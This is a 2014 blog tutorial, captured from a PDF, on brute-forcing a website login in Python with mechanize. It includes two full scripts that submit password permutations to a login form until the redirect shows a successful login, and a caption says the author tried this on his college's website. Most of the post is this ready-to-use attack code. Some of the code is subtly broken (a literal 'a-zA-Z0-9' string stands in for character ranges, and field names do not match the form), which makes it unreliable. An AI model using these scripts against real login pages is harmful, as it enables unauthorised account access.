28/02/2020 Brute Force A Website Login In Python | Coder In Aero

Coder In Aero

Learn More. Write More. Become More.

POSTED BY

TEJA R D
POSTED ON

DECEMBER 8, 2014
POSTED UNDER

HACKING, PYTHON
COMMENTS

LEAVE A COMMENT

Brute Force A Website Login In Python

(h ps://coderinaero.files.wordpress.com/2014/12/main.jpg)
Screen shot of python script running brute-force a ack on my college’s website.

This post gives brief introduction to Brute Force A ack, Mechanize in Python for web
browsing and explains a sample python script to brute force a website login.

https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 1/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero

Brute Force Attack

Brute force is the easiest way one can implement to recover lost passwords (Yet it can take
literally ages to crack one). Basically, this involves checking all possible combinations of
passwords until the right one is found. This can be really helpful when characters in the
password is known but not the correct combination, here possible combinations decrease
drastically. Following paragraph gives a vague idea of how much time it can take to find
right combination in the worst case scenario.

Suppose the length of password is N and we know nothing about characters present in the
string, possible characters can be all alphabets (upper and lowercase), numbers (0-9) and
special characters (~, @, #, $, ^), thus each character of the password string can be any of
the above 67 characters which leads to a total of 67^N combinations (as you can clearly see
it increases exponentially with the length). If we are brute forcing a website login, time
taken significantly depends on the internet speed, for instance it can do four login checks
per second, it takes nearly 58 hours to crack a password of four character length. Suppose
if we know the characters, we can find the correct combination in 64 seconds, far less than
previous case.

Mechanize

In the following brute-force script we use Mechanize

(h p://wwwsearch.sourceforge.net/mechanize/), a python library for stateful
programmatic web browsing, used for automating interaction with websites (Initially it
was wri en for PERL (h p://search.cpan.org/~ether/WWW-Mechanize-
1.73/lib/WWW/Mechanize.pm) users). There are many ways to install this library.
Following two ways will automatically download the latest version source and install it
(for linux users).

Easy Install:

easy_install mechanize

Pip:

pip install mechanize

https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 2/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero

For installing it manually you can go through their documentation at Mechanize

(h p://wwwsearch.sourceforge.net/mechanize/). Here are few things you have to know
about mechanize in order to understand the sample script.

1. Initializing browser object:

import mechanize
br = mechanize.Browser()

2. Opening the login page:

response = br.open(url)

3. Selecting the required form in the page:

br.select_form("form name") #selecting forms by name

br.select_form(nr=0) #use to select the first form in the page i

4. Filling the form: Assign values to the form fields

br.form['userName'] = 'user name'

br.form['password'] = 'password'

5. Submi ing form:

br.method = "POST"
response = br.submit()
print response.geturl() #url to which the page has redirected after log

To learn more about mechanize: Cheat sheet

(h p://dreamrunner.org/wiki/public_html/Python/Python%20Mechanize%20Cheat%20Sh
eet%20.html) | Missing manual (h p://qxf2.com/blog/python-mechanize-the-missing-
manual/) | Browsing in python
(h p://www.pythonforbeginners.com/mechanize/browsing-in-python-with-mechanize)

https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 3/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero

Sample Python script

1. Import required modules

We will use Python’s core module ‘itertools’ for generating possible password
combinations.

#!/usr/bin/python
import mechanize
import itertools

2. Initializing browse object

Initialize using mechanize.Browser( )

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False) #no robots

3. Generating combinations

If you know characters in the password. (Go through itertools docs for more info.)

combinations = itertools.permutations("i34^UhP#",8)
#takes characters and length of string to generate as arguments(no repe

Otherwise (I would not recommend this for obvious reasons)

combinations =itertools.permutations("a-zA-Z0-9!@#$%^",n)

4. Establishing connection and checking the possibilities

Here is the final python code.

https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 4/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero

1 #!/usr/bin/python
2 import mechanize
3 import itertools
4
5 br = mechanize.Browser()
6 br.set_handle_equiv(True)
7 br.set_handle_redirect(True)
8 br.set_handle_referer(True)
9 br.set_handle_robots(False)
10
11 combos = itertools.permutations("i3^4hUP-",8)
12 br.open("h p://www.example.com/login/")
13 for x in combos:
14 br.select_form( nr = 0 )
15 br.form['userName'] = "user name"
16 br.form['password'] = ''.join(x)
17 print "Checking ",br.form['password']
18 response=br.submit()
19 if response.geturl()=="h p://www.example.com/redirected_to_url":
20 #url to which the page is redirected after login
21 print "Correct password is ",''.join(x)
22 break
view raw brute_force.py hosted with by GitHub

Troubleshooting errors

mechanize._mechanize.FormNotFoundError: no form matching nr 0

Most the time i ended up ge ing this error even though there is a form element in the
page. I thought this might be due to bad HTML in the page. Anyway you can solve this
error by changing the form element in the browser object (copy the form element from the
page’s HTML ). Here is the new code snippet:

1 #!/usr/bin/python
2 import mechanize
3 import itertools
4
5 br = mechanize.Browser()
https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 5/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero

6 br.set_handle_equiv(True)
7 br.set_handle_redirect(True)
8 br.set_handle_referer(True)
9 br.set_handle_robots(False)
10
11 combos=itertools.permutations("i34U^hP-",8)
12 r =br.open("h ps://www.example.com/login/")
13 for x in combos:
14 new_form = '''
15 <form method="post" action="index.php">
16 <b>Enter the username :</b><input type="text" name="rollno" size="16" maxleng
17 <b>Enter the password:</b><input type="password" name="pwd" size="16">
18 <input type="submit" name="submit" value="Submit">
19 </form>
20 '''
21 #all you have to take care is they have the same name for input fields and submi
22 r.set_data(new_form)
23 br.set_response(r)
24 br.select_form( nr = 0 )
25 br.form['userName'] = "user name"
26 br.form['password'] = ''.join(x)
27 print "Checking ",br.form['password']
28 response=br.submit()
29 if response.geturl()=="h p://www.example.com/redirected_to_url":
30 #url to which the page is redirected after login
31 print "Correct password is ",''.join(x)
32 break

view raw troubleshoot_mechanize.py hosted with by GitHub

Advertisements Advertisements

https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 6/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero

https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 7/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero

https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 8/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero

Powered by wordads.co Powered by wordads.co

Seen ad many times Seen ad many times

https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 9/10
28/02/2020 Brute Force A Website Login In Python | Coder In Aero
Seen ad many times Seen ad many times

Not relevant Not relevant

Offensive Offensive

Covers content Covers content

Broken Broken

REPORT THIS AD REPORT THIS AD

Brute force (h ps://coderinaero.wordpress.com/tag/brute-force/)
Hacking (h ps://coderinaero.wordpress.com/tag/hacking/)
Mechanize (h ps://coderinaero.wordpress.com/tag/mechanize/)
Python (h ps://coderinaero.wordpress.com/tag/python/)

Blog at WordPress.com.

https://coderinaero.wordpress.com/2014/12/08/brute-force-a-website-login-in-python/#more-3 10/10